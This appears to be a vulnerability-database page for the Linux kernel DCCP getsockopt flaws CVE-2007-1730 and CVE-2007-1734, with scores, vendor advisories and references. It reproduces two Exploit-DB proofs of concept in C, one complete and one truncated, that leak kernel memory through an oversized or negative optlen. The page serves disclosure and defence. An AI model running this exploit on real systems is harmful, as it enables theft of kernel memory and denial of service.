CVE-2007-1730
Published 2007-03-28
Priority P418 · medium · 6.6 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:N/A:C
EXPLOIT
EPSS 0.77% (51.1th percentile)
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
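| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.6 | MEDIUM | AV:L/AC:L/Au:N/C:C/I:N/A:C |
| vendor_ubuntu | — | 7.8 | HIGH | — |
| vendor_redhat | — | 6.6 | MEDIUM | — |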
GHSA
GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed·2022-05-01·CVSS 6.6
CVE-2007-1734 [MEDIUM] GHSA-92h4-4w9c-9q5w: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
GHSA
GHSA-3788-fmr6-h469: Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto
ghsa_unreviewed·2022-05-01
CVE-2007-1730 [MEDIUM] GHSA-3788-fmr6-h469: Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2007-05-24·CVSS 7.8
CVE-2007-1357 [HIGH] Linux kernel vulnerabilities
Philipp Richter discovered that the AppleTalk protocol handler did
not sufficiently verify the length of packets. By sending a crafted
AppleTalk packet, a remote attacker could exploit this to crash the
kernel. (CVE-2007-1357)
Gabriel Campana discovered that the do_ipv6_setsockopt() function did
not sufficiently verify option values for IPV6_RTHDR. A local
attacker could exploit this to trigger a kernel crash. (CVE-2007-1388)
A Denial of Service vulnerability was discovered in the
nfnetlink_log() netfilter function. A remote attacker could exploit
this to trigger a kernel crash. (CVE-2007-1496)
The connection tracking module for IPv6 did not properly handle the
status field when reassembling fragmented packets,
Red Hat
CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
vendor_redhat·CVSS 6.6
CVE-2007-1734 [MEDIUM] CVE-2007-1734: The DCCP support in the do_dccp_getsockopt function in net/dccp/proto
The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
Red Hat
kernel dccp memory disclosure
vendor_redhat·CVSS 6.6
CVE-2007-1730 [MEDIUM] kernel dccp memory disclosure
Integer signedness error in the DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later allows local users to read kernel memory or cause a denial of service (oops) via a negative optlen value.
Statement: Not vulnerable. This issue did not affect the version of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
exploitdb·2007-03-28
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)
---
```c
/* Header names were stripped in extraction; these cover the calls used below. */
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
    /* Large user buffer that the kernel is asked to fill */
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == (void*)-1) {
        printf("Alloc failed\n");
        return -1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
    }
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
    /* optlen far above the option's real size: the missing upper-bound check (CVE-2007-1734) */
    int len = BUFSIZE;
    int x = getsockopt(s, 269, 11, mem, &len);
    if (x == -1)
        perror("SETSOCKOPT");
    else
        printf("SUCCESS\n");
    write(1, mem, BUFSIZE);
    return 0;
}

// milw0rm.com [2007-03-28]
```
Exploit-DB
Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
exploitdb·2007-03-27
CVE-2007-1734 Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)
---
```c
/*
Linux Kernel DCCP Memory Disclosure Vulnerability
Synopsis:
The Linux kernel is susceptible to a locally exploitable flaw
which may allow local users to steal data from the kernel memory.
Vulnerable Systems:
Linux Kernel Versions: >= 2.6.20 with DCCP support enabled.
Kernel versions
#include
#include
#include
#include
#include
#include
#define BUFSIZE 0x10000000
int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                     MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (!mem) {
        printf("Cannot allocate mem\n");
        return 1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
    }
    int len = -1;
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV
```
References
http://marc.info/?l=dccp&m=117509584316267&w=2
http://secunia.com/advisories/25392
http://securityreason.com/securityalert/2482
http://www.securityfocus.com/archive/1/463934/100/0/threaded
http://www.securityfocus.com/archive/1/464144/100/0/threaded
http://www.securityfocus.com/bid/23162
http://www.securitytracker.com/id?1017820
http://www.ubuntu.com/usn/usn-464-1
http://www.vupen.com/english/advisories/2007/1143
https://exchange.xforce.ibmcloud.com/vulnerabilities/33274